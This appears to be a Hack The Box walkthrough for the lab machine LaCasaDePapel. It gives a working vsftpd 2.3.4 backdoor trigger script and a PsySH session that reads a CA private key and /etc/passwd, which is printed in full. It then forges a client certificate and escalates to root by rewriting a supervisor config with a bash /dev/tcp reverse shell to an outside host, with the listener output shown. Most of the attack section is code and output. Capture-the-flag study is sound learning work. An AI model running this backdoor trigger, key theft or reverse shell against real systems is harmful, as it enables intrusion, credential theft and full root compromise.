HTB - LaCasaDePapel

Getting Root:

Tools Used:

Nmap

Enumeration

FTP - Port 21

#!/usr/bin/python3                                                                                                                                                                            
import socket                                                                                                                                                                                 
import sys                                                                                                                                                                                    
import time                                                                                                                                                                                   
                                                                                                                                                                                              
                                                                                                                                                                                              
def exploit(ip):                                                                                                                                                                              
    """ Triggers vsftpd 2.3.4 backdoor """                                                                                                                                                    
                                                                                                                                                                                              
    try:                                                                                                                                                                                      
        print('[*] Attempting to trigger backdoor...')                                                                                                                                        
        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                                                                                                                        
        ftp_socket.connect((ip, 21))                                                                                                                                                          
                                                                                                                                                                                              
        # Attempt to login to trigger backdoor                                                                                                                                                
        ftp_socket.send(b'USER letmein:)\n')                                                                                                                                                  
        ftp_socket.send(b'PASS please\n')                                                                                                                                                     
        time.sleep(2)                                                                                                                                                                         
        ftp_socket.close()                                                                                                                                                                    
        print('[+] Triggered backdoor')                                                                                                                                                       
                                                                                                                                                                                              
    except Exception:                                                                                                                                                                         
        print('[!] Failed to trigger backdoor on %s' % ip)                                                                                                                                    
                                                                                                                                                                                              
                                                                                                                                                                                              
if __name__ == '__main__':                                                                                                                                                                    
                                                                                                                                                                                              
    if len(sys.argv) < 2:                                                                                                                                                                     
        print('Usage: ./vsftpd_234_exploit.py <IP address>')                                                                                                                                  
        print('Example: ./vsftpd_234_exploit.py 192.168.1.10')                                                                                                                                
                                                                                                                                                                                              
    else:                                                                                                                                                                                     
        exploit(sys.argv[1])

python3 vsftpd_234_exploit.py 10.10.10.131                                                                                                              
[*] Attempting to trigger backdoor...                                                                                                                                                         
[+] Triggered backdoor

Port 6200

rlwrap telnet 10.10.10.131 6200                                                                                                                         
Trying 10.10.10.131...                                                                                                                                                                        
Connected to 10.10.10.131.                                                                                                                                                                    
Escape character is '^]'.                                                                                                                                                                     
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman                                                                                                                                         
scandir(".")                                                                                                                                                                                  
=> [                                                                                                                                                                                          
     ".",                                                                                                                                                                                     
     "..",                                                                                                                                                                                    
     ".DS_Store",                                                                                                                                                                             
     "._.DS_Store",                                                                                                                                                                           
     "bin",                                                                                                                                                                                   
     "boot",                                                                                                                                                                                  
     "dev",                                                                                                                                                                                   
     "etc",                                                                                                                                                                                   
     "home",                                                                                                                                                                                  
     "lib",                                                                                                                                                                                   
     "lost+found",                                                                                                                                                                            
     "media",                                                                                                                                                                                 
     "mnt",                                                                                                                                                                                   
     "opt",                                                                                                                                                                                   
     "proc",                                                                                                                                                                                  
     "root",                                                                                                                                                                                  
     "run",                                                                                                                                                                                   
     "sbin",
     "srv",
     "swap",
     "sys",
     "tmp",
     "usr",
     "var",
   ]
scandir("/home")
=> [
     ".",
     "..",
     "berlin",
     "dali",
     "nairobi",
     "oslo",
     "professor",
   ]
ls
Variables: $tokyo
show $tokyo
  > 2| class Tokyo {
    3|  private function sign($caCert,$userCsr) {
    4|          $caKey = file_get_contents('/home/nairobi/ca.key');
    5|          $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
    6|          openssl_x509_export($userCert, $userCertOut);
    7|          return $userCertOut;
    8|  }
    9| }

file_get_contents("/home/nairobi/ca.key")
=> """
   -----BEGIN PRIVATE KEY-----\n
   MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
   7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
   2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
   uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
   YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
   s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
   PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
   Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
   1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
   /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
   q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
   uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
   I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
   7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
   G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
   sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
   CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
   sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
   ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
   zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
   ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
   9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
   WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
   7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
   aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
   53udBEzjt3WPqYGkkDknVhjD\n
   -----END PRIVATE KEY-----\n
   """

file_get_contents("/etc/passwd")
=> """
   root:x:0:0:root:/root:/bin/ash\n
   bin:x:1:1:bin:/bin:/sbin/nologin\n
   daemon:x:2:2:daemon:/sbin:/sbin/nologin\n
   adm:x:3:4:adm:/var/adm:/sbin/nologin\n
   lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n
   sync:x:5:0:sync:/sbin:/bin/sync\n
   shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n
   halt:x:7:0:halt:/sbin:/sbin/halt\n
   mail:x:8:12:mail:/var/spool/mail:/sbin/nologin\n
   news:x:9:13:news:/usr/lib/news:/sbin/nologin\n
   uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\n
   operator:x:11:0:operator:/root:/bin/sh\n
   man:x:13:15:man:/usr/man:/sbin/nologin\n
   postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin\n
   cron:x:16:16:cron:/var/spool/cron:/sbin/nologin\n
   ftp:x:21:21::/var/lib/ftp:/sbin/nologin\n
   sshd:x:22:22:sshd:/dev/null:/sbin/nologin\n
   at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin\n
   squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin\n
   xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin\n
   games:x:35:35:games:/usr/games:/sbin/nologin\n
   postgres:x:70:70::/var/lib/postgresql:/bin/sh\n
   cyrus:x:85:12::/usr/cyrus:/sbin/nologin\n
   vpopmail:x:89:89::/var/vpopmail:/sbin/nologin\n
   ntp:x:123:123:NTP:/var/empty:/sbin/nologin\n
   smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin\n
   guest:x:405:100:guest:/dev/null:/sbin/nologin\n
   nobody:x:65534:65534:nobody:/:/sbin/nologin\n
   chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin\n
   dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh\n
   berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash\n
   professor:x:1002:1002:professor,,,:/home/professor:/bin/ash\n
   vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin\n
   memcached:x:102:102:memcached:/home/memcached:/sbin/nologin\n
   """

HTTPS

We get certificate error

Creating a certificate so that we can access the https site

# Connecting to the site to check it out
# openssl s_client -connect lacasadepapel.htb:443                                                                                                    
CONNECTED(00000003)                                                                                                                                                                           
depth=0 CN = 'lacasadepapel.htb', O = 'La Casa De Papel'                                                                                                                                          
verify error:num=18:self signed certificate                                                                                                                                                   
verify return:1                                                                                                                                                                               
depth=0 CN = 'lacasadepapel.htb', O = 'La Casa De Papel'                                                                                                                                         
verify return:1                                                                                                                                                                               
---                                                                                                                                                                                           
Certificate chain                                                                                                                                                                             
 0 s:CN = lacasadepapel.htb, O = La Casa De Papel                                                                                                                                             
   i:CN = lacasadepapel.htb, O = La Casa De Papel                                                                                                                                             
---                                                                                                                                                                                           
Server certificate                                                                                                                                                                            
-----BEGIN CERTIFICATE-----                                                                                                                                                                   
MIIC6jCCAdICCQDISiE8M6B29jANBgkqhkiG9w0BAQsFADA3MRowGAYDVQQDDBFs                                                                                                                              
YWNhc2FkZXBhcGVsLmh0YjEZMBcGA1UECgwQTGEgQ2FzYSBEZSBQYXBlbDAeFw0x                                                                                                                              
OTAxMjcwODM1MzBaFw0yOTAxMjQwODM1MzBaMDcxGjAYBgNVBAMMEWxhY2FzYWRl                                                                                                                              
cGFwZWwuaHRiMRkwFwYDVQQKDBBMYSBDYXNhIERlIFBhcGVsMIIBIjANBgkqhkiG                                                                                                                              
9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/5vJpuaxJF3A5q2rV
QJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e8DR9ksBQYyXqOZZ8
/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsOhl4+KB4cM4hNhE5B
4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVzmhlHVypqsfS9rKUV
ESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55ZD66vQBSkN2PwBeiR
PBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wMZwIDAQABMA0GCSqG
SIb3DQEBCwUAA4IBAQCuo8yzORz4pby9tF1CK/4cZKDYcGT/wpa1v6lmD5CPuS+C
hXXBjK0gPRAPhpF95DO7ilyJbfIc2xIRh1cgX6L0ui/SyxaKHgmEE8ewQea/eKu6
vmgh3JkChYqvVwk7HRWaSaFzOiWMKUU8mB/7L95+mNU7DVVUYB9vaPSqxqfX6ywx
BoJEm7yf7QlJTH3FSzfew1pgMyPxx0cAb5ctjQTLbUj1rcE9PgcSki/j9WyJltkI
EqSngyuJEu3qYGoM0O5gtX13jszgJP+dA3vZ1wqFjKlWs2l89pb/hwRR2raqDwli
MgnURkjwvR1kalXCvx9cST6nCkxF2TxlmRpyNXy4
-----END CERTIFICATE-----
subject=CN = lacasadepapel.htb, O = La Casa De Papel

issuer=CN = lacasadepapel.htb, O = La Casa De Papel

---

# openssl req -x509 -new -nodes -key CAbull/ca.key -sha256 -days 356 -out CAbull/squid22.pem   
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:La Casa De Papel
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:lacasadepapel.htb
Email Address []:



# openssl pkcs12 -export -in squid22.pem -inkey ca.key -out squid22.p12
Enter Export Password:
Verifying - Enter Export Password:

Importing the certificate to the browser

Verifying the file

# file id_rsa 
id_rsa: OpenSSH private key

Privilege Escalation

There is file named memcached.ini owned by root in the home directory of user professor.

lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x    4 professo professo      4096 Mar  6  2019 .
drwxr-xr-x    7 root     root          4096 Feb 16  2019 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jan 31  2019 .ssh
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules
lacasadepapel [~]$

Contents of the memcached.ini file

cat memcached.ini 
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

Using pspy64, we can see that something access this file and executes the command.


2020/04/12 06:06:02 FS:                 OPEN | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:               ACCESS | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:               ACCESS | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:             OPEN DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:             OPEN DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:           ACCESS DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:    CLOSE_NOWRITE DIR | /home/professor                                                                                                                                
2020/04/12 06:06:02 FS:    CLOSE_NOWRITE DIR | /home/professor/                                                                                                                               
2020/04/12 06:06:02 FS:                 OPEN | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:               ACCESS | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:               ACCESS | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /home/professor/memcached.ini                                                                                                                  
2020/04/12 06:06:02 FS:                 OPEN | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.py                                                                                    
2020/04/12 06:06:02 FS:                 OPEN | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc                                                                                   
2020/04/12 06:06:02 FS:               ACCESS | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc                                                                                   
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc                                                                                   
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.py                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/supervisord.conf                                                                                                                          
2020/04/12 06:06:02 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:               ACCESS | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:               ACCESS | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:               ACCESS | /etc/passwd                                                                                                                                    
2020/04/12 06:06:02 FS:        CLOSE_NOWRITE | /etc/passwd 
2020/04/12 06:07:04 FS:                 OPEN | /var/log/messages                                                                                                                              
2020/04/12 06:07:04 FS:               MODIFY | /var/log/messages                                                                                                                              
2020/04/12 06:07:04 CMD: UID=0    PID=22236  | sudo -u nobody /usr/bin/node /home/professor/memcached.js                                                                                      
2020/04/12 06:07:04 FS:        CLOSE_NOWRITE | /etc/sudoers                                                                                                                                   
2020/04/12 06:07:04 FS:                 OPEN | /etc/passwd                                                                                                                                    
2020/04/12 06:07:04 FS:               ACCESS | /etc/passwd

# We can't edit the file but we can rename it 
lacasadepapel [~]$ mv memcached.ini memcached.ini.bkp

# We add a reverse shell to the file
lacasadepapel [~]$ echo "[program:memcached]" > memcached.ini
lacasadepapel [~]$ echo 'command = bash -c "bash -i >& /dev/tcp/10.10.14.27/1337 0>&1"' >> memcached.ini 
 

# verify the contents of the file
cat memcached.ini
[program:memcached]
command = bash -c "bash -i >& /dev/tcp/10.10.14.27/1337 0>&1"

We get a shell as root

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:52718.
bash: cannot set terminal process group (23063): Not a tty
bash: no job control in this shell
bash-4.4# id
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-4.4#

PreviousHTB - Nibbles NextHTB - Sense

Last updated 5 years ago